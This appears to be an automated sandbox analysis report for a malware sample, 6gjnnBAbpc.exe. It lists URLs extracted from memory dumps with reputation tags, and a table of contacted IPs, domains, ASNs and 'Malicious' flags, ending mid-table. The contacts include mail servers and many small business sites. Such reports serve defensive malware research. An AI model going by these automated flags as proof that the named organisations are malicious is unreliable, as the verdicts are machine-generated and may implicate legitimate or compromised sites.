6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-50x18.jpg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://www.pcgrate.com/checkout/6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://pohlfood.com/privacy-policy/6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.wifi4all.nl/MP6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://layerslider.com6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.16gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://com-sit.com/leistungen/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=66gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://pohlfood.com/#breadcrumb6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/rotronic/6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.valselit.com/wp-content/uploads/labsense/maison-a-vendre/10533_hflip.jpg6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.elpro.si/wp-includes/js/jquery/ui/resizable.min.js?ver=1.13.26gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.26gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                  172.217.218.26
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  104.26.7.17
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  217.69.139.150
                                                                                                                                                                                                                                                  mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                  47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                                                                                                  198.49.23.145
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                  76.74.184.61
                                                                                                                                                                                                                                                  alexpope.bizCanada
                                                                                                                                                                                                                                                  13768COGECO-PEER1CAtrue
                                                                                                                                                                                                                                                  107.180.58.31
                                                                                                                                                                                                                                                  orbitgas.comUnited States
                                                                                                                                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                  142.251.31.26
                                                                                                                                                                                                                                                  gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  203.137.75.45
                                                                                                                                                                                                                                                  okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                  172.67.152.159
                                                                                                                                                                                                                                                  www.tvtools.fiUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  142.251.31.27
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  153.126.211.112
                                                                                                                                                                                                                                                  mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  217.160.0.131
                                                                                                                                                                                                                                                  mackusick.deGermany
                                                                                                                                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                  203.210.102.34
                                                                                                                                                                                                                                                  ascc.org.auAustralia
                                                                                                                                                                                                                                                  7496WEBCENTRAL-ASWebCentralAUtrue
                                                                                                                                                                                                                                                  5.189.171.125
                                                                                                                                                                                                                                                  muhr-soehne.deGermany
                                                                                                                                                                                                                                                  51167CONTABODEtrue
                                                                                                                                                                                                                                                  198.49.23.144
                                                                                                                                                                                                                                                  riwn.orgUnited States
                                                                                                                                                                                                                                                  53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                  194.143.194.23
                                                                                                                                                                                                                                                  reproar.comSpain
                                                                                                                                                                                                                                                  8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                                                                                                  83.223.113.46
                                                                                                                                                                                                                                                  dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                  29017GYRONGBtrue
                                                                                                                                                                                                                                                  157.112.187.75
                                                                                                                                                                                                                                                  cjcagent.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  91.229.22.126
                                                                                                                                                                                                                                                  pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                  198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                  172.67.165.62
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  104.21.65.224
                                                                                                                                                                                                                                                  hyab.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  217.74.161.133
                                                                                                                                                                                                                                                  cnti.krsn.ruRussian Federation
                                                                                                                                                                                                                                                  16300INTERTAX-AREARUtrue
                                                                                                                                                                                                                                                  13.248.169.48
                                                                                                                                                                                                                                                  onzcda.comUnited States
                                                                                                                                                                                                                                                  16509AMAZON-02UStrue
                                                                                                                                                                                                                                                  85.128.196.22
                                                                                                                                                                                                                                                  strazynski.plPoland
                                                                                                                                                                                                                                                  15967NAZWAPLtrue
                                                                                                                                                                                                                                                  202.254.236.40
                                                                                                                                                                                                                                                  www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                  173.194.202.26
                                                                                                                                                                                                                                                  alt4.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  81.2.194.241
                                                                                                                                                                                                                                                  www.edimart.huCzech Republic
                                                                                                                                                                                                                                                  24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                  37.59.243.164
                                                                                                                                                                                                                                                  aluminox.esFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  217.19.254.22
                                                                                                                                                                                                                                                  shanks.co.ukUnited Kingdom
                                                                                                                                                                                                                                                  60819SAFENAMES-ASGBtrue
                                                                                                                                                                                                                                                  35.186.238.101
                                                                                                                                                                                                                                                  gcss.comUnited States
                                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                                  185.163.45.187
                                                                                                                                                                                                                                                  softizer.comMoldova Republic of
                                                                                                                                                                                                                                                  39798MIVOCLOUDMDtrue
                                                                                                                                                                                                                                                  216.177.137.32
                                                                                                                                                                                                                                                  fortknox.bmUnited States
                                                                                                                                                                                                                                                  3955321P-WSSUStrue
                                                                                                                                                                                                                                                  109.71.54.22
                                                                                                                                                                                                                                                  akdeniz.nlNetherlands
                                                                                                                                                                                                                                                  202053UPCLOUDFItrue
                                                                                                                                                                                                                                                  219.94.129.97
                                                                                                                                                                                                                                                  web-york.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  49.212.232.113
                                                                                                                                                                                                                                                  unicus.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                  74.208.215.145
                                                                                                                                                                                                                                                  indonesiamedia.comUnited States
                                                                                                                                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                  104.21.89.126
                                                                                                                                                                                                                                                  kavram.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  104.21.30.14
                                                                                                                                                                                                                                                  cubodown.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                  49.12.155.123
                                                                                                                                                                                                                                                  adventist.roGermany
                                                                                                                                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                  54.36.175.146
                                                                                                                                                                                                                                                  biurohera.plFrance
                                                                                                                                                                                                                                                  16276OVHFRtrue
                                                                                                                                                                                                                                                  104.26.10.81
                                                                                                                                                                                                                                                  www.com-sit.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  46.30.60.158
                                                                                                                                                                                                                                                  ncn.deGermany
                                                                                                                                                                                                                                                  15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEtrue
                                                                                                                                                                                                                                                  104.21.23.9
                                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  78.46.224.133
                                                                                                                                                                                                                                                  amic.atGermany
                                                                                                                                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                  77.78.104.3
